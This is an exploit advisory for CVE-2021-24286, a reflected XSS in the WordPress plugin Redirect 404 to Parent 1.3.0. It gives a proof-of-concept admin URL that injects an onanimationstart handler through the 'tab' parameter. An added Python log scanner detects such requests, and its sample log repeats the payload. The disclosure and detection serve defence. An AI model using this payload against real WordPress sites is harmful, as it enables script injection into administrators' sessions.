WordPress Redirect 404 to Parent plugin version 1.3.0 suffers from a cross-site scripting vulnerability.
advisories | CVE-2021-24286
# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)
# Date: 2/3/2021
# Author: 0xB9
# Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip
# Version: 1.3.0
# Tested on: Windows 10
# CVE: CVE-2021-24286

1. Description:
This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS.
2. Proof of Concept:
wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
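
Added example, not part of the original advisory or the plugin's code: a log check that flags requests to this settings page whose decoded tab value contains anything other than slug characters. The slug rule, the benign tab name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate tab names are plain slugs; tighten to your install's real tabs.
SAFE_TAB = re.compile(r"[A-Za-z0-9_-]*")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-admin/options-general.php'
    '?page=moove-redirect-settings&tab=settings_tab HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-admin/options-general.php'
    '?page=moove-redirect-settings&tab=%22+style=animation-name:rotation'
    '+onanimationstart=%22alert(/XSS/); HTTP/1.1" 200 5188',
    '198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-admin/options-general.php'
    '?page=other-settings&tab=%22x HTTP/1.1" 200 4000',
    '198.51.100.4 - - [01/Jan/2024:10:03:00 +0000] "GET /blog/wp-admin/options-general.php'
    '?page=moove-redirect-settings&tab=a%2522b HTTP/1.1" 200 4000',
]

def suspicious_tab(log_line):
    """Return the decoded tab value if the line requests the plugin's settings
    page with a tab value outside the slug character set, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # endswith() also covers WordPress installed in a subdirectory.
    if not url.path.endswith("/wp-admin/options-general.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if "moove-redirect-settings" not in params.get("page", []):
        return None
    for value in params.get("tab", []):
        # fullmatch, so a trailing newline or a leftover '%' cannot slip through.
        if not SAFE_TAB.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (index, decoded tab value) for every flagged line."""
    return [(i, v) for i, v in ((i, suspicious_tab(l)) for i, l in enumerate(lines))
            if v is not None]

if __name__ == "__main__":
    for i, value in scan(SAMPLE_LOG):
        print(f"line {i}: unexpected tab value {value!r}")
```

A hit shows that a crafted link was requested, not that script executed in an administrator's browser.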